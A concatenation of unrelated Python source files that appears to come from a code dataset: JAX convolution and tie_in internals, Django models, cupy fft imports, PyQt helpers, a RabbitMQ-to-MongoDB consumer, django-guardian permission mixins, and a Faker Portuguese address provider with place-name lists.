proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _conv_general_vjp_lhs_padding(
in_shape, window_dimensions, window_strides, out_shape, padding,
lhs_dilation, rhs_dilation) -> List[Tuple[int, int]]:
lhs_dilated_shape = _dilate_shape(in_shape, lhs_dilation)
rhs_dilated_shape = _dilate_shape(window_dimensions, rhs_dilation)
out_dilated_shape = _dilate_shape(out_shape, window_strides)
pad_before = np.subtract(rhs_dilated_shape, [lo for lo, _ in padding]) - 1
pad_after = (np.add(lhs_dilated_shape, rhs_dilated_shape) - 1
- out_dilated_shape - pad_before)
return safe_zip(pad_before, pad_after)
def _conv_general_vjp_rhs_padding(
in_shape, window_dimensions, window_strides, out_shape, padding,
lhs_dilation, rhs_dilation):
lhs_dilated_shape = _dilate_shape(in_shape, lhs_dilation)
rhs_dilated_shape = _dilate_shape(window_dimensions, rhs_dilation)
out_dilated_shape = _dilate_shape(out_shape, window_strides)
total_in_pad = out_dilated_shape + rhs_dilated_shape - lhs_dilated_shape - 1
return [(pad[0], tot - pad[0]) for pad, tot in zip(padding, total_in_pad)]
def _balanced_eq(x, z, y):
return div(select(_eq_meet(x, z), _ones(z), _zeros(z)),
select(_eq_meet(y, z), _twos(z), _ones(z)))
def _eq_meet(a, b):
a_dtype, b_dtype = _dtype(a), _dtype(b)
if a_dtype != b_dtype:
higher_dtype = dtypes.promote_types(a_dtype, b_dtype)
if higher_dtype == a_dtype:
a = convert_element_type(a, b_dtype)
else:
b = convert_element_type(b, a_dtype)
return eq(a, b)
def _abstractify(x):
return raise_to_shaped(core.get_aval(x))
def _check_user_dtype_supported(dtype, fun_name=None):
# Avoid using `dtype in [...]` becuase of numpy dtype equality overloading.
if isinstance(dtype, type) and dtype in {bool, int, float, complex}:
return
np_dtype = np.dtype(dtype)
if np_dtype.kind not in "biufc" and np_dtype.type != dtypes.bfloat16:
msg = f"JAX only supports number and bool dtypes, got dtype {dtype}"
msg += f" in {fun_name}" if fun_name else ""
raise TypeError(msg)
if dtype is not None and np_dtype != dtypes.canonicalize_dtype(dtype):
msg = ("Explicitly requested dtype {} {} is not available, "
"and will be truncated to dtype {}. To enable more dtypes, set the "
"jax_enable_x64 configuration option or the JAX_ENABLE_X64 shell "
"environment variable. "
"See https://github.com/google/jax#current-gotchas for more.")
fun_name = f"requested in {fun_name}" if fun_name else ""
truncated_dtype = dtypes.canonicalize_dtype(dtype).name
warnings.warn(msg.format(dtype, fun_name , truncated_dtype), stacklevel=2)
def _canonicalize_axis(axis, num_dims):
"""Canonicalize an axis in [-num_dims, num_dims) to [0, num_dims)."""
axis = operator.index(axis)
if not -num_dims <= axis < num_dims:
raise ValueError(
"axis {} is out of bounds for array of dimension {}".format(
axis, num_dims))
if axis < 0:
axis = axis + num_dims
return axis
tie_in_p = Primitive('tie_in')
@config.register_omnistaging_disabler
def omnistaging_disabler() -> None:
global tie_in
def tie_in(x: Array, y: Array) -> Array:
"""Returns the value of ``y`` but with a fake data dependence on ``x``.
When staging to XLA (e.g. running under jit or pmap), values that don't depend
on computation inputs are computed op-by-op, and folded into the XLA
computation as constants.
``tie_in`` provides a way to explicitly stage values into the computation.
When staging to XLA and ``x`` is already staged, then the result of ``tie_in``
is ``y``, but staged to XLA. Downstream use of the result will also be staged
to XLA.
For example, ``lax.sin(const)`` would be constant-folded if ``const`` is
a constant array, but ``lax.sin(lax.tie_in(x, const))``, will be staged to
XLA as long as ``x`` is staged to XLA.
"""
if config.omnistaging_enabled:
return y
else:
return tie_in_p.bind(x, y)
# If lax has already been imported, we need to monkey-patch the
# lax/__init__.py import of tie_in. If not (i.e. if this is running at lax
# module creation time) then we'll get an import error.
try:
jax.lax.tie_in = tie_in
except AttributeError:
pass
def _tie_in_transpose_rule(t, x, y):
if ad.is_undefined_primal(x):
return [ad_util.Zero(x.aval), t]
else:
return [ad_util.Zero.from_value(x), t]
def _tie_in_batch_rule(batched_args, batch_dims):
y = tie_in(*batched_args)
_, bdim_y = batch_dims
return y, bdim_y
def _tie_in_impl(x, y):
core.check_valid_jaxtype(x)
core.check_valid_jaxtype(y)
return y
def _tie_in_jvp(primals, tangents):
x, y = primals
x_dot, y_dot = tangents
if type(y_dot) is ad_util.Zero or core.get_aval(y_dot).dtype is dtypes.float0:
return y, y_dot # skip tying in in this case
else:
return ad.linear_jvp(tie_in_p, primals, tangents)
tie_in_p.def_impl(_tie_in_impl)
tie_in_p.def_abstract_eval(lambda x, y: raise_to_shaped(y))
xla.translations[tie_in_p] = lambda c, x, y: y
ad.primitive_jvps[tie_in_p] = _tie_in_jvp
ad.primitive_transposes[tie_in_p] = partial(ad.linear_transpose2, _tie_in_transpose_rule)
batching.primitive_batchers[tie_in_p] = _tie_in_batch_rule
masking.masking_rules[tie_in_p] = lambda vals, logical_shapes: vals[1]
|
py | b415cd56b8b968d2043025ce5a7780e981f5488b | from django.db import models
from datetime import datetime
import string, random
import uuid
# Create your models here.
class HeaderNavs(models.Model):
title = models.CharField(max_length = 50)
url = models.CharField(max_length = 50)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = "HeaderNavs"
class Blogs(models.Model):
title = models.CharField(max_length = 50)
short_description = models.TextField(max_length = 100)
description = models.TextField()
created_at = models.DateTimeField(default=datetime.now, blank=True)
avatar = models.ImageField(upload_to = 'static/img/avatar/', default = 'static/img/avatar_1.jpg')
slug = models.CharField(max_length=40, blank=True, default=uuid.uuid4, unique=True)
def __str__(self):
return self.title
class Meta:
verbose_name_plural = "Blogs"
|
py | b415cf3353cef721ca6c2f231f99a00ab7dc211f | from cupy.fft.fft import fft # NOQA
from cupy.fft.fft import fft2 # NOQA
from cupy.fft.fft import fftfreq # NOQA
from cupy.fft.fft import fftn # NOQA
from cupy.fft.fft import fftshift # NOQA
from cupy.fft.fft import hfft # NOQA
from cupy.fft.fft import ifft # NOQA
from cupy.fft.fft import ifft2 # NOQA
from cupy.fft.fft import ifftn # NOQA
from cupy.fft.fft import ifftshift # NOQA
from cupy.fft.fft import ihfft # NOQA
from cupy.fft.fft import irfft # NOQA
from cupy.fft.fft import irfft2 # NOQA
from cupy.fft.fft import irfftn # NOQA
from cupy.fft.fft import rfft # NOQA
from cupy.fft.fft import rfft2 # NOQA
from cupy.fft.fft import rfftfreq # NOQA
from cupy.fft.fft import rfftn # NOQA
|
py | b415cf3fd78ddd73ff4e9d925ed7da611fe0a29c | __author__ = 'nhaines'
from PyQt4 import QtCore
from PyQt4 import QtGui
from PyQt4 import QtNetwork
import network
class BaseApp(QtGui.QApplication):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default"):
super(BaseApp, self).__init__(argv)
self.setOrganizationName(organization)
self.setApplicationName(name)
self.onLoad()
self.lastWindowClosed.connect(self.onExit)
def onLoad(self):
pass
def onExit(self):
pass
class HttpClientApp(BaseApp):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default"):
self.client = QtNetwork.QNetworkAccessManager()
super(HttpClientApp, self).__init__(argv, organization, name)
def onLoad(self):
cookies = QtNetwork.QNetworkCookie.parseCookies(QtCore.QSettings().value("network/client/cookies", ""))
cookie_jar = QtNetwork.QNetworkCookieJar()
cookie_jar.setAllCookies(cookies)
self.client.setCookieJar(cookie_jar)
def onExit(self):
cookies = QtCore.QByteArray()
for cookie in self.client.cookieJar().allCookies():
cookies.append(cookie.toRawForm())
QtCore.QSettings().setValue("network/client/cookies", cookies)
class HttpServerApp(BaseApp):
def __init__(self, argv=[], organization="PyQtHelpers", name="Default", port=8080):
self.server = network.HttpServer()
super(HttpServerApp, self).__init__(argv, organization, name)
self.server.listen(QtNetwork.QHostAddress.LocalHost, port=port)
def onExit(self):
self.server.close()
|
py | b415cfb6b7f3b00f6f016fd65aa914241f22e560 | import asyncio
import aio_pika
import json
from random import choice
from datetime import datetime
from motor.motor_asyncio import AsyncIOMotorClient
RABBITMQ_DSN = 'amqp://user:password@host:5672'
QUEUE_NAME = "mongo_task"
MONGO_DSN = 'mongodb://user:password@host:27017'
MONGO_DB = 'task_test'
MONGO_COLLECTION = 'task'
count_processed_messages = 0
DELAY_IN_SECONDS = [1, 2, 3, 4, 5, 6, 7, 8]
async def update_mongo(task_id: str, document_id: str, field: str, value: str):
clause = {
'task_id': task_id,
'documents.id': document_id
}
connection = AsyncIOMotorClient(MONGO_DSN)
collection = connection[MONGO_DB][MONGO_COLLECTION]
new_value = {
f'documents.$.{field}': value
}
await collection.update_one(clause, {'$set': new_value})
if field == 'finished':
clause = {
'$and': [
{'task_id': task_id},
{'documents.finished': {'$ne': None}}
]
}
new_value = {
'$set': {'finished': value}
}
result = await collection.update_one(clause, new_value)
return result.matched_count
async def process_message(message: aio_pika.IncomingMessage):
"""
Обработка сообщений с автоматическим подтверждением получения
:param message:
:return:
"""
async with message.process():
global count_processed_messages
delay = choice(DELAY_IN_SECONDS)
count_processed_messages += 1
message_content = message.body.decode('utf-8')
data = json.loads(message_content)
task_id = data['task_id']
document_id = data['document_id']
await update_mongo(task_id, document_id, 'started', datetime.now().isoformat())
await asyncio.sleep(delay)
result = await update_mongo(task_id, document_id, 'finished', datetime.now().isoformat())
if result:
print(result)
print(f'Get result {count_processed_messages}: {data} with time {delay}')
async def main(main_loop, rabbitmq_conn: str, queue_name: str):
connection: aio_pika.RobustConnection = await aio_pika.connect_robust(rabbitmq_conn, loop=main_loop)
channel = await connection.channel()
exchange = await channel.declare_exchange("direct", durable=True, auto_delete=False)
queue = await channel.declare_queue(queue_name, auto_delete=False, durable=True)
await queue.bind(exchange, queue_name)
await queue.consume(process_message)
print('[x] Start consumer for ', queue_name)
return connection
if __name__ == "__main__":
loop = asyncio.get_event_loop()
rabbit_connection = loop.run_until_complete(main(loop, RABBITMQ_DSN, QUEUE_NAME))
try:
loop.run_forever()
finally:
loop.run_until_complete(rabbit_connection.close())
|
py | b415d006822293e5c424620a3ced177a252f3602 | from __future__ import unicode_literals
from collections import Iterable
from django.conf import settings
from django.contrib.auth.decorators import REDIRECT_FIELD_NAME
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ImproperlyConfigured
from django.core.exceptions import PermissionDenied
from guardian.compat import basestring
from guardian.models import UserObjectPermission
from guardian.utils import get_403_or_None
from guardian.utils import get_anonymous_user
class LoginRequiredMixin(object):
"""
A login required mixin for use with class based views. This Class is a
light wrapper around the `login_required` decorator and hence function
parameters are just attributes defined on the class.
Due to parent class order traversal this mixin must be added as the left
most mixin of a view.
The mixin has exaclty the same flow as `login_required` decorator:
If the user isn't logged in, redirect to ``settings.LOGIN_URL``, passing
the current absolute path in the query string. Example:
``/accounts/login/?next=/polls/3/``.
If the user is logged in, execute the view normally. The view code is
free to assume the user is logged in.
**Class Settings**
``LoginRequiredMixin.redirect_field_name``
*Default*: ``'next'``
``LoginRequiredMixin.login_url``
*Default*: ``settings.LOGIN_URL``
"""
redirect_field_name = REDIRECT_FIELD_NAME
login_url = settings.LOGIN_URL
def dispatch(self, request, *args, **kwargs):
return login_required(redirect_field_name=self.redirect_field_name,
login_url=self.login_url)(
super(LoginRequiredMixin, self).dispatch
)(request, *args, **kwargs)
class PermissionRequiredMixin(object):
"""
A view mixin that verifies if the current logged in user has the specified
permission by wrapping the ``request.user.has_perm(..)`` method.
If a `get_object()` method is defined either manually or by including
another mixin (for example ``SingleObjectMixin``) or ``self.object`` is
defined then the permission will be tested against that specific instance,
alternatively you can specify `get_permission_object()` method if ``self.object``
or `get_object()` does not return the object against you want to test permission
.. note:
Testing of a permission against a specific object instance requires an
authentication backend that supports. Please see ``django-guardian`` to
add object level permissions to your project.
The mixin does the following:
If the user isn't logged in, redirect to settings.LOGIN_URL, passing
the current absolute path in the query string. Example:
/accounts/login/?next=/polls/3/.
If the `raise_exception` is set to True than rather than redirect to
login page a `PermissionDenied` (403) is raised.
If the user is logged in, and passes the permission check than the view
is executed normally.
**Example Usage**::
class SecureView(PermissionRequiredMixin, View):
...
permission_required = 'auth.change_user'
...
**Class Settings**
``PermissionRequiredMixin.permission_required``
*Default*: ``None``, must be set to either a string or list of strings
in format: *<app_label>.<permission_codename>*.
``PermissionRequiredMixin.login_url``
*Default*: ``settings.LOGIN_URL``
``PermissionRequiredMixin.redirect_field_name``
*Default*: ``'next'``
``PermissionRequiredMixin.return_403``
*Default*: ``False``. Returns 403 error page instead of redirecting
user.
``PermissionRequiredMixin.raise_exception``
*Default*: ``False``
`permission_required` - the permission to check of form "<app_label>.<permission codename>"
i.e. 'polls.can_vote' for a permission on a model in the polls application.
``PermissionRequiredMixin.accept_global_perms``
*Default*: ``False``, If accept_global_perms would be set to True, then
mixing would first check for global perms, if none found, then it will
proceed to check object level permissions.
``PermissionRequiredMixin.permission_object``
*Default*: ``None``, object against which test the permission; if None fallback
to ``self.get_permission_object()`` which return ``self.get_object()``
or ``self.object`` by default.
"""
# default class view settings
login_url = settings.LOGIN_URL
permission_required = None
redirect_field_name = REDIRECT_FIELD_NAME
return_403 = False
raise_exception = False
accept_global_perms = False
permission_object = None
def get_required_permissions(self, request=None):
"""
Returns list of permissions in format *<app_label>.<codename>* that
should be checked against *request.user* and *object*. By default, it
returns list from ``permission_required`` attribute.
:param request: Original request.
"""
if isinstance(self.permission_required, basestring):
perms = [self.permission_required]
elif isinstance(self.permission_required, Iterable):
perms = [p for p in self.permission_required]
else:
raise ImproperlyConfigured("'PermissionRequiredMixin' requires "
"'permission_required' attribute to be set to "
"'<app_label>.<permission codename>' but is set to '%s' instead"
% self.permission_required)
return perms
def get_permission_object(self):
if self.permission_object:
return self.permission_object
return (hasattr(self, 'get_object') and self.get_object()
or getattr(self, 'object', None))
def check_permissions(self, request):
"""
Checks if *request.user* has all permissions returned by
*get_required_permissions* method.
:param request: Original request.
"""
obj = self.get_permission_object()
forbidden = get_403_or_None(request,
perms=self.get_required_permissions(
request),
obj=obj,
login_url=self.login_url,
redirect_field_name=self.redirect_field_name,
return_403=self.return_403,
accept_global_perms=self.accept_global_perms
)
if forbidden:
self.on_permission_check_fail(request, forbidden, obj=obj)
if forbidden and self.raise_exception:
raise PermissionDenied()
return forbidden
def on_permission_check_fail(self, request, response, obj=None):
"""
Method called upon permission check fail. By default it does nothing and
should be overridden, if needed.
:param request: Original request
:param response: 403 response returned by *check_permissions* method.
:param obj: Object that was fetched from the view (using ``get_object``
method or ``object`` attribute, in that order).
"""
def dispatch(self, request, *args, **kwargs):
self.request = request
self.args = args
self.kwargs = kwargs
response = self.check_permissions(request)
if response:
return response
return super(PermissionRequiredMixin, self).dispatch(request, *args,
**kwargs)
class GuardianUserMixin(object):
@staticmethod
def get_anonymous():
return get_anonymous_user()
def add_obj_perm(self, perm, obj):
return UserObjectPermission.objects.assign_perm(perm, self, obj)
def del_obj_perm(self, perm, obj):
return UserObjectPermission.objects.remove_perm(perm, self, obj)
|
py | b415d07053da87e99968731c7e54109f1f29ad4d | from .. import Provider as AddressProvider
class Provider(AddressProvider):
street_prefixes = (
"Av",
"Avenida",
"R.",
"Rua",
"Travessa",
"Largo",
"Alameda",
"Praça",
)
city_formats = ("{{city_name}}",)
street_name_formats = (
"{{street_prefix}} {{last_name}}",
"{{street_prefix}} {{first_name}} {{last_name}}",
"{{street_prefix}} de {{last_name}}",
"{{street_prefix}} {{place_name}}",
)
street_address_formats = ("{{street_name}}, {{building_number}}",)
address_formats = ("{{street_address}}\n{{postcode}} {{city}}",)
building_number_formats = ("S/N", "%", "%#", "%#", "%#", "%##")
postcode_formats = ("####-###",)
cities = (
"Abrantes",
"Agualva-Cacém",
"Albufeira",
"Alcobaça",
"Alcácer do Sal",
"Almada",
"Almeirim",
"Alverca do Ribatejo",
"Amadora",
"Amarante",
"Amora",
"Anadia",
"Angra do Heroísmo",
"Aveiro",
"Barcelos",
"Barreiro",
"Beja",
"Braga",
"Bragança",
"Caldas da Rainha",
"Caniço",
"Cantanhede",
"Cartaxo",
"Castelo Branco",
"Chaves",
"Coimbra",
"Costa da Caparica",
"Covilhã",
"Câmara de Lobos",
"Elvas",
"Entroncamento",
"Ermesinde",
"Esmoriz",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Fafe",
"Faro",
"Felgueiras",
"Figueira da Foz",
"Fiães",
"Freamunde",
"Funchal",
"Fundão",
"Fátima",
"Gafanha da Nazaré",
"Gandra",
"Gondomar",
"Gouveia",
"Guarda",
"Guimarães",
"Horta",
"Lagoa",
"Lagos",
"Lamego",
"Leiria",
"Lisboa",
"Lixa",
"Loulé",
"Loures",
"Lourosa",
"Macedo de Cavaleiros",
"Maia",
"Mangualde",
"Marco de Canaveses",
"Marinha Grande",
"Matosinhos",
"Mealhada",
"Miranda do Douro",
"Mirandela",
"Montemor-o-Novo",
"Montijo",
"Moura",
"Mêda",
"Odivelas",
"Olhão",
"Oliveira de Azeméis",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ovar",
"Paredes",
"Paços de Ferreira",
"Penafiel",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponte de Sor",
"Portalegre",
"Portimão",
"Porto",
"Porto Santo",
"Praia da Vitória",
"Póvoa de Santa Iria",
"Póvoa de Varzim",
"Quarteira",
"Queluz",
"Rebordosa",
"Reguengos de Monsaraz",
"Ribeira Grande",
"Rio Maior",
"Rio Tinto",
"Sabugal",
"Sacavém",
"Santa Comba Dão",
"Santa Cruz",
"Santa Maria da Feira",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"Seia",
"Seixal",
"Serpa",
"Setúbal",
"Silves",
"Sines",
"Sintra",
"São João da Madeira",
"São Mamede de Infesta",
"São Salvador de Lordelo",
"Tarouca",
"Tavira",
"Tomar",
"Tondela",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Valbom",
"Vale de Cambra",
"Valongo",
"Valpaços",
"Vendas Novas",
"Viana do Castelo",
"Vila Franca de Xira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Santo André",
"Vila Real",
"Vila Real de Santo António",
"Vila do Conde",
"Viseu",
"Vizela",
"Évora",
"Ílhavo",
)
countries = (
"Afeganistão",
"África do Sul",
"Akrotiri",
"Albânia",
"Alemanha",
"Andorra",
"Angola",
"Anguila",
"Antárctida",
"Antígua e Barbuda",
"Antilhas Neerlandesas",
"Arábia Saudita",
"Arctic Ocean",
"Argélia",
"Argentina",
"Arménia",
"Aruba",
"Ashmore and Cartier Islands",
"Atlantic Ocean",
"Austrália",
"Áustria",
"Azerbaijão",
"Baamas",
"Bangladeche",
"Barbados",
"Barém",
"Bélgica",
"Belize",
"Benim",
"Bermudas",
"Bielorrússia",
"Birmânia",
"Bolívia",
"Bósnia e Herzegovina",
"Botsuana",
"Brasil",
"Brunei",
"Bulgária",
"Burquina Faso",
"Burúndi",
"Butão",
"Cabo Verde",
"Camarões",
"Camboja",
"Canadá",
"Catar",
"Cazaquistão",
"Chade",
"Chile",
"China",
"Chipre",
"Clipperton Island",
"Colômbia",
"Comores",
"Congo-Brazzaville",
"Congo-Kinshasa",
"Coral Sea Islands",
"Coreia do Norte",
"Coreia do Sul",
"Costa do Marfim",
"Costa Rica",
"Croácia",
"Cuba",
"Dhekelia",
"Dinamarca",
"Domínica",
"Egipto",
"Emiratos Árabes Unidos",
"Equador",
"Eritreia",
"Eslováquia",
"Eslovénia",
"Espanha",
"Estados Unidos",
"Estónia",
"Etiópia",
"Faroé",
"Fiji",
"Filipinas",
"Finlândia",
"França",
"Gabão",
"Gâmbia",
"Gana",
"Gaza Strip",
"Geórgia",
"Geórgia do Sul e Sandwich do Sul",
"Gibraltar",
"Granada",
"Grécia",
"Gronelândia",
"Guame",
"Guatemala",
"Guernsey",
"Guiana",
"Guiné",
"Guiné Equatorial",
"Guiné-Bissau",
"Haiti",
"Honduras",
"Hong Kong",
"Hungria",
"Iémen",
"Ilha Bouvet",
"Ilha do Natal",
"Ilha Norfolk",
"Ilhas Caimão",
"Ilhas Cook",
"Ilhas dos Cocos",
"Ilhas Falkland",
"Ilhas Heard e McDonald",
"Ilhas Marshall",
"Ilhas Salomão",
"Ilhas Turcas e Caicos",
"Ilhas Virgens Americanas",
"Ilhas Virgens Britânicas",
"Índia",
"Indian Ocean",
"Indonésia",
"Irão",
"Iraque",
"Irlanda",
"Islândia",
"Israel",
"Itália",
"Jamaica",
"Jan Mayen",
"Japão",
"Jersey",
"Jibuti",
"Jordânia",
"Kuwait",
"Laos",
"Lesoto",
"Letónia",
"Líbano",
"Libéria",
"Líbia",
"Listenstaine",
"Lituânia",
"Luxemburgo",
"Macau",
"Macedónia",
"Madagáscar",
"Malásia",
"Malávi",
"Maldivas",
"Mali",
"Malta",
"Man, Isle of",
"Marianas do Norte",
"Marrocos",
"Maurícia",
"Mauritânia",
"Mayotte",
"México",
"Micronésia",
"Moçambique",
"Moldávia",
"Mónaco",
"Mongólia",
"Monserrate",
"Montenegro",
"Mundo",
"Namíbia",
"Nauru",
"Navassa Island",
"Nepal",
"Nicarágua",
"Níger",
"Nigéria",
"Niue",
"Noruega",
"Nova Caledónia",
"Nova Zelândia",
"Omã",
"Pacific Ocean",
"Países Baixos",
"Palau",
"Panamá",
"Papua-Nova Guiné",
"Paquistão",
"Paracel Islands",
"Paraguai",
"Peru",
"Pitcairn",
"Polinésia Francesa",
"Polónia",
"Porto Rico",
"Portugal",
"Quénia",
"Quirguizistão",
"Quiribáti",
"Reino Unido",
"República Centro-Africana",
"República Checa",
"República Dominicana",
"Roménia",
"Ruanda",
"Rússia",
"Salvador",
"Samoa",
"Samoa Americana",
"Santa Helena",
"Santa Lúcia",
"São Cristóvão e Neves",
"São Marinho",
"São Pedro e Miquelon",
"São Tomé e Príncipe",
"São Vicente e Granadinas",
"Sara Ocidental",
"Seicheles",
"Senegal",
"Serra Leoa",
"Sérvia",
"Singapura",
"Síria",
"Somália",
"Southern Ocean",
"Spratly Islands",
"Sri Lanca",
"Suazilândia",
"Sudão",
"Suécia",
"Suíça",
"Suriname",
"Svalbard e Jan Mayen",
"Tailândia",
"Taiwan",
"Tajiquistão",
"Tanzânia",
"Território Britânico do Oceano Índico",
"Territórios Austrais Franceses",
"Timor Leste",
"Togo",
"Tokelau",
"Tonga",
"Trindade e Tobago",
"Tunísia",
"Turquemenistão",
"Turquia",
"Tuvalu",
"Ucrânia",
"Uganda",
"União Europeia",
"Uruguai",
"Usbequistão",
"Vanuatu",
"Vaticano",
"Venezuela",
"Vietname",
"Wake Island",
"Wallis e Futuna",
"West Bank",
"Zâmbia",
"Zimbabué",
)
# From https://pt.wikipedia.org/wiki/Distritos_de_Portugal
distritos = (
"Aveiro",
"Beja",
"Braga",
"Bragança",
"Castelo Branco",
"Coimbra",
"Évora",
"Faro",
"Guarda",
"Leiria",
"Lisboa",
"Portalegre",
"Porto",
"Santarém",
"Setúbal",
"Viana do Castelo",
"Vila Real",
"Viseu",
)
# From https://pt.wikipedia.org/wiki/Lista_de_concelhos_por_NUTS,_distritos_e_ilhas
concelhos = (
"Águeda",
"Aguiar da Beira",
"Alandroal",
"Albergaria-a-Velha",
"Albufeira",
"Alcácer do Sal",
"Alcanena",
"Alcobaça",
"Alcochete",
"Alcoutim",
"Alenquer",
"Alfândega da Fé",
"Alijó",
"Aljezur",
"Aljustrel",
"Almada",
"Almeida",
"Almeirim",
"Almodôvar",
"Alpiarça",
"Alter do Chão",
"Alvaiázere",
"Alvito",
"Amadora",
"Amarante",
"Amares",
"Anadia",
"Angra do Heroísmo",
"Ansião",
"Arcos de Valdevez",
"Arganil",
"Armamar",
"Arouca",
"Arraiolos",
"Arronches",
"Arruda dos Vinhos",
"Aveiro",
"Avis",
"Azambuja",
"Baião",
"Barcelos",
"Barrancos",
"Barreiro",
"Batalha",
"Beja",
"Belmonte",
"Benavente",
"Bombarral",
"Borba",
"Boticas",
"Braga",
"Bragança",
"Cabeceiras de Basto",
"Cadaval",
"Caldas da Rainha",
"Calheta (R.A.A.)",
"Calheta (R.A.M.)",
"Câmara de Lobos",
"Caminha",
"Campo Maior",
"Cantanhede",
"Carrazeda de Ansiães",
"Carregal do Sal",
"Cartaxo",
"Cascais",
"Castanheira de Pêra",
"Castelo Branco",
"Castelo de Paiva",
"Castelo de Vide",
"Castro Daire",
"Castro Marim",
"Castro Verde",
"Celorico da Beira",
"Celorico de Basto",
"Chamusca",
"Chaves",
"Cinfães",
"Coimbra",
"Condeixa-a-Nova",
"Constância",
"Coruche",
"Corvo",
"Covilhã",
"Crato",
"Cuba",
"Elvas",
"Entroncamento",
"Espinho",
"Esposende",
"Estarreja",
"Estremoz",
"Évora",
"Fafe",
"Faro",
"Felgueiras",
"Ferreira do Alentejo",
"Ferreira do Zêzere",
"Figueira da Foz",
"Figueira de Castelo Rodrigo",
"Figueiró dos Vinhos",
"Fornos de Algodres",
"Freixo de Espada à Cinta",
"Fronteira",
"Funchal",
"Fundão",
"Gavião",
"Góis",
"Golegã",
"Gondomar",
"Gouveia",
"Grândola",
"Guarda",
"Guimarães",
"Horta",
"Idanha-a-Nova",
"Ílhavo",
"Lagoa",
"Lagoa (R.A.A)",
"Lagos",
"Lajes das Flores",
"Lajes do Pico",
"Lamego",
"Leiria",
"Lisboa",
"Loulé",
"Loures",
"Lourinhã",
"Lousã",
"Lousada",
"Mação",
"Macedo de Cavaleiros",
"Machico",
"Madalena",
"Mafra",
"Maia",
"Mangualde",
"Manteigas",
"Marco de Canaveses",
"Marinha Grande",
"Marvão",
"Matosinhos",
"Mealhada",
"Meda",
"Melgaço",
"Mértola",
"Mesão Frio",
"Mira",
"Miranda do Corvo",
"Miranda do Douro",
"Mirandela",
"Mogadouro",
"Moimenta da Beira",
"Moita",
"Monção",
"Monchique",
"Mondim de Basto",
"Monforte",
"Montalegre",
"Montemor-o-Novo",
"Montemor-o-Velho",
"Montijo",
"Mora",
"Mortágua",
"Moura",
"Mourão",
"Murça",
"Murtosa",
"Nazaré",
"Nelas",
"Nisa",
"Nordeste",
"Óbidos",
"Odemira",
"Odivelas",
"Oeiras",
"Oleiros",
"Olhão",
"Oliveira de Azeméis",
"Oliveira de Frades",
"Oliveira do Bairro",
"Oliveira do Hospital",
"Ourém",
"Ourique",
"Ovar",
"Paços de Ferreira",
"Palmela",
"Pampilhosa da Serra",
"Paredes",
"Paredes de Coura",
"Pedrógão Grande",
"Penacova",
"Penafiel",
"Penalva do Castelo",
"Penamacor",
"Penedono",
"Penela",
"Peniche",
"Peso da Régua",
"Pinhel",
"Pombal",
"Ponta Delgada",
"Ponta do Sol",
"Ponte da Barca",
"Ponte de Lima",
"Ponte de Sor",
"Portalegre",
"Portel",
"Portimão",
"Porto",
"Porto de Mós",
"Porto Moniz",
"Porto Santo",
"Povoação",
"Póvoa de Lanhoso",
"Póvoa de Varzim",
"Proença-a-Nova",
"Redondo",
"Reguengos de Monsaraz",
"Resende",
"Ribeira Brava",
"Ribeira de Pena",
"Ribeira Grande",
"Rio Maior",
"Sabrosa",
"Sabugal",
"Salvaterra de Magos",
"Santa Comba Dão",
"Santa Cruz",
"Santa Cruz da Graciosa",
"Santa Cruz das Flores",
"Santa Maria da Feira",
"Santa Marta de Penaguião",
"Santana",
"Santarém",
"Santiago do Cacém",
"Santo Tirso",
"São Brás de Alportel",
"São João da Madeira",
"São João da Pesqueira",
"São Pedro do Sul",
"São Roque do Pico",
"São Vicente",
"Sardoal",
"Sátão",
"Seia",
"Seixal",
"Sernancelhe",
"Serpa",
"Sertã",
"Sesimbra",
"Setúbal",
"Sever do Vouga",
"Silves",
"Sines",
"Sintra",
"Sobral de Monte Agraço",
"Soure",
"Sousel",
"Tábua",
"Tabuaço",
"Tarouca",
"Tavira",
"Terras de Bouro",
"Tomar",
"Tondela",
"Torre de Moncorvo",
"Torres Novas",
"Torres Vedras",
"Trancoso",
"Trofa",
"Vagos",
"Vale de Cambra",
"Valença",
"Valongo",
"Valpaços",
"Velas",
"Vendas Novas",
"Viana do Alentejo",
"Viana do Castelo",
"Vidigueira",
"Vieira do Minho",
"Vila da Praia da Vitória",
"Vila de Rei",
"Vila do Bispo",
"Vila do Conde",
"Vila do Porto",
"Vila Flor",
"Vila Franca de Xira",
"Vila Franca do Campo",
"Vila Nova da Barquinha",
"Vila Nova de Cerveira",
"Vila Nova de Famalicão",
"Vila Nova de Foz Côa",
"Vila Nova de Gaia",
"Vila Nova de Paiva",
"Vila Nova de Poiares",
"Vila Pouca de Aguiar",
"Vila Real",
"Vila Real de Santo António",
"Vila Velha de Ródão",
"Vila Verde",
"Vila Viçosa",
"Vimioso",
"Vinhais",
"Viseu",
"Vizela",
"Vouzela",
)
# From https://pt.wikipedia.org/wiki/Lista_de_freguesias_de_Portugal
freguesias = [
"Abrantes",
"Águeda",
"Aguiar da Beira",
"Alandroal",
"Albergaria-a-Velha",
"Albufeira",
"Alcácer do Sal",
"Alcanena",
"Alcobaça",
"Alcochete",
"Alcoutim",
"Alenquer",
"Alfândega da Fé",
"Alijó",
"Aljezur",
"Aljustrel",
"Almada",
"Almeida",
"Almeirim",
"Almodôvar",
"Alpiarça",
"Alter do Chão",
"Alvaiázere",
"Alvito",
"Amadora",
"Amarante",
"Amares",
"Anadia",
"Angra do Heroísmo",
"Ansião",
"Arcos de Valdevez",
"Arganil",
"Armamar",
"Arouca",
"Arraiolos",
"Arronches",
"Arruda dos Vinhos",
"Aveiro",
"Avis",
"Azambuja",
"Baião",
"Barcelos",
"Barrancos",
"Barreiro",
"Batalha",
"Beja",
"Belmonte",
"Benavente",
"Bombarral",
"Borba",
"Boticas",
"Braga",
